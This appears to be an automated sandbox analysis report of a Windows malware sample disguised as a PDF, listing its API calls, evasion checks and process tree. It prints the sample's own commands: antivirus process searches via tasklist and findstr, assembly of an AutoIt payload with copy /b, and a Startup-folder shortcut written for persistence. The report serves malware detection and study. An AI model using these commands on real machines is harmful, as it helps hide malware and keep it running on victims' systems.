Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_00AA33B7
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr API coverage: 4.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr TID: 5580 Thread sleep count: 65 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose, 11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD14 FindFirstFileW,FindClose, 11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEFA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00764005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00764005
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076494A GetFileAttributesW,FindFirstFileW,FindClose, 17_2_0076494A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076C2FF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD14 FindFirstFileW,FindClose, 17_2_0076CD14
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 17_2_0076CD9F
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F5D8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F735
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076FA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00763CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00763CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_00A95D13
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: NanoCipher.scr, 00000011.00000002.3351187223.0000000001A70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF45D5 BlockInput, 11_2_00AF45D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_00A95240
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 11_2_00AB5CAC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 11_2_00AD88CD
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00AAA385
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AAA354 SetUnhandledExceptionFilter, 11_2_00AAA354
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072A354 SetUnhandledExceptionFilter, 17_2_0072A354
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0072A385
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD9369 LogonUserW, 11_2_00AD9369
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_00A95240
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE1AC6 SendInput,keybd_event, 11_2_00AE1AC6
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE51E2 mouse_event, 11_2_00AE51E2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 11_2_00AD88CD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 11_2_00AE4F1C
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000290D000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000000.2143063108.0000000000B36000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Spy.pif, NanoCipher.scr Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA885B cpuid 11_2_00AA885B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AC0030 GetLocalTime,__swprintf, 11_2_00AC0030
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AC0722 GetUserNameW, 11_2_00AC0722
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 11_2_00AB416A
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: NanoCipher.scr Binary or memory string: WIN_81
Source: NanoCipher.scr Binary or memory string: WIN_XP
Source: NanoCipher.scr Binary or memory string: WIN_XPe
Source: NanoCipher.scr Binary or memory string: WIN_VISTA
Source: NanoCipher.scr Binary or memory string: WIN_7
Source: NanoCipher.scr Binary or memory string: WIN_8
Source: NanoCipher.scr.11.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 11_2_00AF696E
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_00AF6E32
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0077696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 17_2_0077696E
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00776E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 17_2_00776E32
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546130 Sample: scan_doc_zapit_836893.pdf.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 92 44 EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu 2->44 48 Sigma detected: Suspicious Double Extension File Execution 2->48 50 Sigma detected: Search for Antivirus process 2->50 52 Sigma detected: Drops script at startup location 2->52 54 4 other signatures 2->54 10 scan_doc_zapit_836893.pdf.exe 19 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 3 10->15         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 19 NanoCipher.scr 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\Temp\...\Spy.pif, PE32 15->40 dropped 46 Drops PE files with a suspicious file extension 15->46 21 Spy.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\...36anoCipher.scr, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...38anoCipher.js, ASCII 21->38 dropped 56 Drops PE files with a suspicious file extension 21->56 58 Deletes itself after installation 21->58 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...42anoCipher.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14
No contacted IP infos

Contacted Domains

Name IP Active
EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu unknown unknown